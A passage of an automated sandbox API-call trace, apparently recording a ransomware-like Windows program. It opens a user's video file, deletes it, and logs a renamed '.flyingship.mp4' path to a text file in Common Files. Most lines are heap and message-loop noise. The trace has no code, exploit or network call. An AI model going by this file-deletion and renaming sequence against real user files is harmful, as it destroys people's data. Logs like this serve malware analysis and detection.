[0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.435] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.435] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.435] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.435] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.436] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.436] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\guurkoggeovl1ts9ut.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0199.437] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.437] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.437] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.438] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.438] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.438] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.438] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.438] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.439] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.439] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFilePart=0x0) returned 0x49 [0199.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x1bc52de0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0x90af58 [0199.439] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\guurkoggeovl1ts9ut.mp4")) returned 1 [0199.440] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x1bc52de0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0 [0199.440] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.441] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.441] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.442] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.442] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.443] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.443] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.443] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.444] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.444] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.444] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.444] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.444] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.444] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3ed5, lpOverlapped=0x0) returned 1 [0199.445] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3ed5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\n", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0199.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x57) returned 0x8c4a48 [0199.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\n", cchWideChar=87, lpMultiByteStr=0x8c4a48, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 87 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0199.445] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x56, lpOverlapped=0x0) returned 1 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0199.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.445] CloseHandle (hObject=0x158) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.447] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.449] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.449] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.449] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.455] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 